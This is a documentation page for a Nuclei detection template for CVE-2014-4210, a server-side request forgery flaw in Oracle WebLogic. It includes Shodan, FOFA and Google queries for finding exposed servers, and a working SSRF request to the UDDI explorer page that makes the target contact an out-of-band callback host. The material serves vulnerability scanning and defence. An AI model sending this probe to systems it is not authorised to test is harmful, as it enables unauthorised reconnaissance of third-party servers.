Skip to content
Nuclei Templates

Oracle Weblogic - Server-Side Request Forgery

ID: CVE-2014-4210

Severity: medium

Author: princechaddha

Tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss

Description

Section titled “Description”

An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.

YAML Source

Section titled “YAML Source”
id: CVE-2014-4210


info:
  name: Oracle Weblogic - Server-Side Request Forgery
  author: princechaddha
  severity: medium
  description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources.
  remediation: |
    Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability
  reference:
    - https://www.oracle.com/security-alerts/cpujul2014.html
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
    - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
    - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
    - http://seclists.org/fulldisclosure/2014/Dec/23
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-4210
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.96657
    epss-percentile: 0.99634
    cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: fusion_middleware
    shodan-query:
      - title:"Weblogic"
      - http.title:"weblogic"
      - http.html:"weblogic application server"
    fofa-query:
      - title="weblogic"
      - body="weblogic application server"
    google-query: intitle:"weblogic"
  tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss


http:
  - method: GET
    path:
      - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"


      - type: word
        part: body
        words:
          - "Search public registries"


      - type: status
        status:
          - 200
# digest: 4a0a004730450221009954cec100ceaeb3798da84fa0699a2d3d5304e7797784ca98c35aa82c68622b0220779a88ea6499831656f2ef137526adb7ca3c7567a0869e42fde7777a677a71ac:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-4210.yaml"

View on Github